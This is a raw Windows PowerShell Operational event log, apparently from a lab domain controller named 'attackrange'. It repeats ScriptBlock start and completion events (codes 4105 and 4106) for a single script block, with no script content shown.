RecordNumber=1468644
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468643
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468642
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468641
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468640
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468639
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468638
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468637
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468636
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468635
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468634
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468633
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468632
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468631
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468630
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468629
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468628
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468627
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468626
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468625
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468624
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468623
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468622
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468621
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468620
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468619
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468618
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468617
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468616
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468615
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468614
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468613
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468612
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468611
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468610
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468609
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468608
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468607
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468606
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468605
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468604
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468603
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468602
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468601
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468600
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468599
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468598
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468597
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468596
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468595
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468594
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468593
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468592
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468591
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468590
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468589
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:13 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
